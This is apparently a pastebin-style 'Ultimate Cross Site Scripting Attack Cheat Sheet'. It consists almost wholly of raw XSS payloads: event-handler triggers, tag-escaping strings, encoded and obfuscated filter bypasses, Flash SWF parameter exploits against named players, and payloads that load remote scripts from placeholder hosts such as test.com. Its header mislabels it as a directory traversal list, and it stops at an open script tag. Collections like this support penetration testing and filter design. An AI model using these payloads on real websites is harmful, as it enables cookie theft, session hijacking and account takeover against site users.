· 6 years ago · Mar 26, 2020, 10:34 PM
1Title: Ultimate Cross Site Scripting Attack Cheat Sheet
2Last Update: 2018-06-28
3
4Note: This is a technical sheet for research about directory- and path traversal attacks.
5Please continue the ultimate directory traversal cheat sheet list or contribute to update.
6This cheat sheet list goes out to assist pentesters, developers, researchers & whitehats.
7
8
9
10
11Tags to Trigger XSS Attacks:
12onclick
13ondblclick
14onmousedown
15onmousemove
16onmouseover
17onmouseout
18onmouseup
19onkeydown
20onkeypress
21onkeyup
22onabort
23onerror
24onload
25onresize
26onscroll
27onunload
28onsubmit
29onblur
30onchange
31onfocus
32onreset
33onselect
34onMoveOn
35
36
37Brackets for Tags
38>"
39">
40<"
41><
42>"<
43.\>"</.
44./>%20<./
45/>%20<
46%20/%20>
47%20">%20<
48%3E%3C
49Pjw=
50
51
52XSS Strings:
53<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
54<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
55<SCRIPT>document.cookie=true;</SCRIPT>
56<IMG SRC="jav ascript:document.cookie=true;">
57<IMG SRC="javascript:document.cookie=true;">
58<IMG SRC="  javascript:document.cookie=true;">
59<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
60<SCRIPT>document.cookie=true;//<</SCRIPT>
61<SCRIPT <B>document.cookie=true;</SCRIPT>
62<IMG SRC="javascript:document.cookie=true;">
63<iframe src="javascript:document.cookie=true;>
64<SCRIPT>a=/XSS/\ndocument.cookie=true;</SCRIPT>
65</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
66<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
67<BODY BACKGROUND="javascript:document.cookie=true;">
68<BODY ONLOAD=document.cookie=true;>
69<IMG DYNSRC="javascript:document.cookie=true;">
70<IMG LOWSRC="javascript:document.cookie=true;">
71<BGSOUND SRC="javascript:document.cookie=true;">
72<BR SIZE="&{document.cookie=true}">
73<LAYER SRC="javascript:document.cookie=true;"></LAYER>
74<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
75<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>XSS
76ºscriptædocument.cookie=true;º/scriptæ
77<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
78<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
79<TABLE BACKGROUND="javascript:document.cookie=true;">
80<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
81<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
82<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
83<DIV STYLE="width: expression(document.cookie=true);">
84<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
85<IMG STYLE="xss:expr/*XSS*/ession(document.cookie=true)">
86<XSS STYLE="xss:expression(document.cookie=true)">
87exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.cookie=true)'>
88<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
89<STYLE>.XSS{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=XSS></A>
90<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
91<SCRIPT>document.cookie=true;</SCRIPT>
92<BASE HREF="javascript:document.cookie=true;//">
93<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
94<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
95<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
96<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
97<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
98<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
99<a href="javascript#document.cookie=true;">
100<div onmouseover="document.cookie=true;">
101<img src="javascript:document.cookie=true;">
102<img dynsrc="javascript:document.cookie=true;">
103<input type="image" dynsrc="javascript:document.cookie=true;">
104<bgsound src="javascript:document.cookie=true;">
105&<script>document.cookie=true;</script>
106&{document.cookie=true;};
107<img src=&{document.cookie=true;};>
108<link rel="stylesheet" href="javascript:document.cookie=true;">
109<img src="mocha:document.cookie=true;">@mario_payload
110<img src="livescript:document.cookie=true;">
111<a href="about:<script>document.cookie=true;</script>">
112<body onload="document.cookie=true;">
113<div style="background-image: url(javascript:document.cookie=true;);">
114<div style="behaviour: url([link to code]);">
115<div style="binding: url([link to code]);">
116<div style="width: expression(document.cookie=true;);">
117<style type="text/javascript">document.cookie=true;</style>
118<object classid="clsid:..." codebase="javascript:document.cookie=true;">
119<style><!--</style><script>document.cookie=true;//--></script>
120<<script>document.cookie=true;</script>
121<script>document.cookie=true;//--></script>
122<!-- -- --><script>document.cookie=true;</script><!-- -- -->
123<img src="blah"onmouseover="document.cookie=true;">
124<img src="blah>" onmouseover="document.cookie=true;">
125<xml src="javascript:document.cookie=true;">
126<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
127<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
128
129
130Restriction Bypass:
131>"<iframe src=http://global-evolution.info/>@gmail.com
132>"<script>alert(document.cookie)</script><div style="1@gmail.com
133>"<script>alert(document.cookie)</script>@gmail.com
134
135
136<html><body>
137<button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,
138101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,1
13910,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:fr
140om.Char.Code</button></body></html>
141
142%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F
143%73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F
144%73%63%72%69%70%74%3E
145
146Obfuscated Bypass:
147>ì<ScriPt>ALeRt("xssOBFSbypass")</scriPt>
148
149
150
151XSS with close TAG to escape:
152>"<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
153>"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
154>"<SCRIPT>document.cookie=true;</SCRIPT>
155>"<IMG SRC="jav ascript:document.cookie=true;">
156>"<IMG SRC="javascript:document.cookie=true;">
157>"<IMG SRC="  javascript:document.cookie=true;">
158>"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
159>"<SCRIPT>document.cookie=true;//<</SCRIPT>
160>"<SCRIPT <B>document.cookie=true;</SCRIPT>
161>"<IMG SRC="javascript:document.cookie=true;">
162>"<iframe src="javascript:document.cookie=true;>
163>"<SCRIPT>a=/XSS/\ndocument.cookie=true;</SCRIPT>
164>"</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
165>"<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
166>"<BODY BACKGROUND="javascript:document.cookie=true;">
167>"<BODY ONLOAD=document.cookie=true;>
168>"<IMG DYNSRC="javascript:document.cookie=true;">
169>"<IMG LOWSRC="javascript:document.cookie=true;">
170>"<BGSOUND SRC="javascript:document.cookie=true;">
171>"<BR SIZE="&{document.cookie=true}">
172>"<LAYER SRC="javascript:document.cookie=true;"></LAYER>
173>"<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
174>"<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>XSS
175>"ºscriptædocument.cookie=true;º/scriptæ
176>"<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
177>"<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
178>"<TABLE BACKGROUND="javascript:document.cookie=true;">
179>"<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
180>"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
181>"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
182>"<DIV STYLE="width: expression(document.cookie=true);">
183>"<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
184>"<IMG STYLE="xss:expr/*XSS*/ession(document.cookie=true)">
185>"<XSS STYLE="xss:expression(document.cookie=true)">
186>"exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.cookie=true)'>
187>"<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
188>"<STYLE>.XSS{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=XSS></A>
189>"<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
190>"<SCRIPT>document.cookie=true;</SCRIPT>
191>"<BASE HREF="javascript:document.cookie=true;//">
192>"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
193>"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
194>"<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
195>"<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
196>"<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
197>"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
198>"<a href="javascript#document.cookie=true;">
199>"<div onmouseover="document.cookie=true;">
200>"<img src="javascript:document.cookie=true;">
201>"<img dynsrc="javascript:document.cookie=true;">
202>"<input type="image" dynsrc="javascript:document.cookie=true;">
203>"<bgsound src="javascript:document.cookie=true;">
204>"&<script>document.cookie=true;</script>
205>"&{document.cookie=true;};
206>"<img src=&{document.cookie=true;};>
207>"<link rel="stylesheet" href="javascript:document.cookie=true;">
208>"<img src="mocha:document.cookie=true;">
209>"<img src="livescript:document.cookie=true;">
210>"<a href="about:<script>document.cookie=true;</script>">
211>"<body onload="document.cookie=true;">
212>"<div style="background-image: url(javascript:document.cookie=true;);">
213>"<div style="behaviour: url([link to code]);">
214>"<div style="binding: url([link to code]);">
215>"<div style="width: expression(document.cookie=true;);">
216>"<style type="text/javascript">document.cookie=true;</style>
217>"<object classid="clsid:..." codebase="javascript:document.cookie=true;">
218>"<style><!--</style><script>document.cookie=true;//--></script>
219>"<<script>document.cookie=true;</script>
220>"<script>document.cookie=true;//--></script>
221>"<!-- -- --><script>document.cookie=true;</script><!-- -- -->
222>"<img src="blah"onmouseover="document.cookie=true;">
223>"<img src="blah>" onmouseover="document.cookie=true;">
224>"<xml src="javascript:document.cookie=true;">
225>"<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
226>"<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
227
228
229
230Others: Random
231';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
232'';!--"<XSS>=&{()}
233<SCRIPT SRC=http://test.com/xss.js></SCRIPT>
234<IMG SRC="javascript:alert('XSS');">
235<IMG SRC=javascript:alert('XSS')>
236<IMG SRC=JaVaScRiPt:alert('XSS')>
237<IMG SRC=javascript:alert("XSS")>
238<IMG SRC=`javascript:alert("RM'XSS'")`>
239<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
240<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
241<IMG SRC="jav ascript:alert('XSS');">
242<IMG SRC="jav	ascript:alert('XSS');">
243<IMG SRC="jav
ascript:alert('XSS');">
244<IMG SRC="jav
ascript:alert('XSS');">
245<IMG
246SRC
247=
248"
249j
250a
251v
252a
253s
254c
255r
256i
257p
258t
259:
260a
261l
262e
263r
264t
265(
266'
267X
268S
269S
270'
271)
272"
273>
274perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
275perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
276<IMG SRC="  javascript:alert('XSS');">
277<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
278<<SCRIPT>alert("XSS");//<</SCRIPT>
279<SCRIPT SRC=http://test.com/xss.js?<B>
280<SCRIPT SRC=//test.com/.j>
281<IMG SRC="javascript:alert('XSS')"
282<iframe src=http://test.com/index.html <
283<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
284\";alert('XSS');//
285</TITLE><SCRIPT>alert("XSS");</SCRIPT>
286<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
287<BODY BACKGROUND="javascript:alert('XSS')">
288<BODY ONLOAD=alert('XSS')>
289<IMG DYNSRC="javascript:alert('XSS')">
290<IMG LOWSRC="javascript:alert('XSS')">
291<BGSOUND SRC="javascript:alert('XSS');">
292<BR SIZE="&{alert('XSS')}">
293<LAYER SRC="http://test/script.html"></LAYER>
294<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
295<LINK REL="stylesheet" HREF="http://test.com/xss.css">
296<STYLE>@import'http://test.com/xss.css';</STYLE>
297<META HTTP-EQUIV="Link" Content="<http://test.com/xss.css>; REL=stylesheet">
298<STYLE>BODY{-moz-binding:url("http://test.com/xssmoz.xml#xss")}</STYLE>
299<XSS STYLE="behavior: url(xss.htc);">
300<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
301<IMG SRC='vbscript:msgbox("XSS")'>
302<IMG SRC="mocha:[code]">
303<IMG SRC="livescript:[code]">
304ºscriptæalert(¢XSS¢)º/scriptæ
305<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
306<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
307<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
308<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
309<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
310<TABLE BACKGROUND="javascript:alert('XSS')">
311<TABLE><TD BACKGROUND="javascript:alert('XSS')">
312<DIV STYLE="background-image: url(javascript:alert('XSS'))">
313<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
314<DIV STYLE="background-image: url(javascript:alert('XSS'))">
315<DIV STYLE="width: expression(alert('XSS'));">
316<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
317<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
318<XSS STYLE="xss:expression(alert('XSS'))"> exp/*<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
319<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
320<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
321<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
322<!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]-->
323<BASE HREF="javascript:alert('XSS');//">
324<OBJECT TYPE="text/x-scriptlet" DATA="http://test.com/scriptlet.html"></OBJECT>
325<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
326<EMBED SRC="http://test.com/xss.swf" AllowScriptAccess="always"></EMBED>
327
328<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
329
330<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
331
332
333<EMBED SRC="data:image/svg+xml;base64,JTIwPiI8PGlmcmFtZSBzcmM9aHR0cDovL3Z1bG4tbGFiLmNvbSBvbmxvYWQ9YWxlcnQoZG9jdW1lbnQuY29va2llKSA8" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
334
335
336Flash SWF XSS
337
338 ZeroClipboard: ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf
339
340 plUpload Player: plupload.flash.swf?%#target%g=alert&uid%g=XSS&
341
342 plUpload MoxiePlayer: Moxie.swf?target%g=confirm&uid%g=XSS (also works with Moxie.cdn.swf and other variants)
343
344 FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert1
345
346 videoJS: video-js.swf?readyFunction=confirm and video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29
347
348 YUI "io.swf": io.swf?yid=\"));}catch(e){alert(document.domain);}//
349
350 YUI "uploader.swf": uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<
351
352 Open Flash Chart: open-flash-chart.swf?get-data=(function(){alert(1)})()
353
354 AutoDemo: control.swf?onend=javascript:alert(1)//
355
356 Adobe FLV Progressive: /main.swf?baseurl=asfunction:getURL,javascript:alert(1)// and /FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//
357
358 Banner.swf (generic): banner.swf?clickTAG=javascript:alert(document.domain);//
359
360 JWPlayer (legacy): player.swf?playerready=alert(document.domain) and /player.swf?tracecall=alert(document.domain)
361
362 SWFUpload 2.2.0.1: swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//
363
364 Uploadify (legacy): uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf
365
366 FlowPlayer 3.2.7: flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf
367
368
369
370a="get";
371b="URL(\"";
372c="javascript:";
373d="alert('XSS');\")";
374eval(a+b+c+d);
375
376
377XML Schema
378<HTML xmlns:xss>
379 <?import namespace="xss" implementation="http://vuln-lab.com/xss.htc">
380 <xss:xss>XSS</xss:xss>
381
382<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
383</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
384
385
386<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
387<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
388
389
390<XML SRC="xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
391
392<HTML><BODY>
393<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
394<?import namespace="t" implementation="#default#time2">
395<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
396</BODY></HTML>
397
398
399<?xml version="1.0" ?>
400<someElement>
401<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>
402</someElement>
403
404
405
406<SCRIPT SRC="http://test.com/xss.jpg"></SCRIPT>
407
408
409<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://test.com/xss.js></SCRIPT>'"-->
410
411<? echo('<SCR)';
412echo('IPT>alert("XSS")</SCRIPT>'); ?>
413
414<IMG SRC="http://www.test.com/file.php?variables=malicious">
415
416Redirect 302 /test.jpg http://test.com/admin.asp&deleteuser
417
418<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
419<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
420<SCRIPT a=">" SRC="http://test.com/xss.js"></SCRIPT>
421<SCRIPT a=`>` SRC="http://test.com/xss.js"></SCRIPT>
422<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://test.com/xss.js"></SCRIPT>
423<A HREF="http://server.com/">XSS</A>
424<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
425<A HREF="http://1113982867/">XSS</A>
426<A HREF="javascript:document.location='http://www.test.com/'">XSS</A>
427
428%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E
429
430<iframe src=http://test.de>
431
432<iframe src=http://test.de>
433
434PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+
435
436
437<input/onmouseover="javaSCRIPT:confirm(1)"
438
439<sVg><scRipt >alert(1) {Opera}
440
441<img/src=`` onerror=this.onerror=confirm(1)
442
443<form><isindex formaction="javascript:confirm(1)"
444
445<img src=``
 onerror=alert(1)

446
447
448<sCrIpt>alert(1)</ScRipt>
449<iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)>
450
451
452<img src='1' onerror\x00=alert(0) />
453
454<img src='1' onerror/=alert(0) />
455
456<img src='1' onerror\x0b=alert(0) />
457
458<img src='1' onerror=\x00alert(0) />
459
460<img src='1' o\x00nerr\x00or=alert(0) />
461
462<\x00img src='1' onerror=alert(0) />
463
464<script\x00>alert(1)</script>
465
466<i\x00mg src='1' onerror=alert(0) />
467
468<img/src='1'/onerror=alert(0)>
469
470<img\x0bsrc='1'\x0bonerror=alert(0)>
471
472<img src='1''onerror='alert(0)'>
473<img src='1'"onerror="alert(0)">
474
475<img src='1'\x00onerror=alert(0)>
476
477<img src='1'onerror=alert(0)>
478
479ì><img title="test-xss" onmouseup="confirm(document.domain)">
480
481
482Firefox (\x09, \x0a, \x0d, \x20)
483Chrome (Any character \x01 to \x20)
484<iframe src="\x01javascript:alert(0)"></iframe> <!-- Example for Chrome -->
485
486
487<img src='1' onerror='alert(0)' <
488
489Extra less-than characters (IE, Firefox, Chrome, Safari).
490<<script>alert(0)</script>
491
492<style>body{background-color:expression\(alert(1))}</style>
493
494
495<script>document.write('<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>');</script>
496
497
498<img src="1" onerror="alert(1)" />
499<img src="1" onerror="alert(1)" />
500<iframe src="javascript:alert(1)"></iframe>
501<iframe src="javascript:alert(1)"></iframe>
502
503
504<iframe src="javascript:alert(1)"></iframe>
505<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>
506
507
508<div style="x:expression(alert(1))">Joker</div>
509<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">Joker</div>
510<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">Joker</div>
511<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">Joker</div>
512
513
514<script>document.write('<img src=1 onerror=alert(1)>');</script>
515<script>document.write('\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E');</script>
516<script>document.write('\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076');</script>
517<script>document.write('\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E');</script>
518
519<script>document.write('<img src=1 onerror=alert(1)>');</script>
520<script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));</script>
521
522
523<script>alert(123)</script>
524<script>\u0061\u006C\u0065\u0072\u0074(123)</script>
525
526
527< = %C0%BC = %E0%80%BC = %F0%80%80%BC
528> = %C0%BE = %E0%80%BE = %F0%80%80%BE
529' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
530" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
531
532<img src="1" onnerror="alert(1)">
533%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
534
535
536<img src="1" onerror="alert(1)" />
537+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
538
539
540<script>alert(1)</script>
541%uff1cscript%uff1ealert(1)%uff1c/script%uff1e
542
543
544<img src="1" onerror="alert('1')">
545%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A
546
547
548<video src="http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)" />
549<video src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)" />
550
551
552<blah style="blah:expression(alert(1))" />
553
554
555<div style="z:exp/*anything*/res/*here*/sion(alert(1))" />
556
557
558<script>window['alert'](0)</script>
559<script>parent['alert'](1)</script>
560<script>self['alert'](2)</script>
561<script>top['alert'](3)</script>
562
563
564<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
565
566
567<script>
568var junk = '</script><script>alert(1)</script>';
569</script>
570
571
572<style>
573body { background-image:url('http://www.test.com/</style><script>alert(1)</script>'); }
574</style>
575
576
577<iframe src="javascript:alert(1)"></iframe>
578<iframe src="vbscript:msgbox(1)"></iframe> (IE)
579<iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)
580<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari)
581
582
583http://test.com/something.xxx?a=val1&a=val2
584ASP.NET a = val1,val2
585ASP a = val1,val2
586JSP a = val1
587PHP a = val2
588
589
590<script>eval(location.hash.slice(1))</script>
591<script>eval(location.hash)</script> (Firefox)
592
593http://test.com/something.jsp?inject=<script>eval(location.hash.slice(1))</script>#alert(1)
594
595
596<iframe src="http://test.com/something.jsp?inject=<script>eval(name)</script>" name="alert(1)"></iframe>
597
598
599<script>
600$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();
601</script>
602
603
604<script>
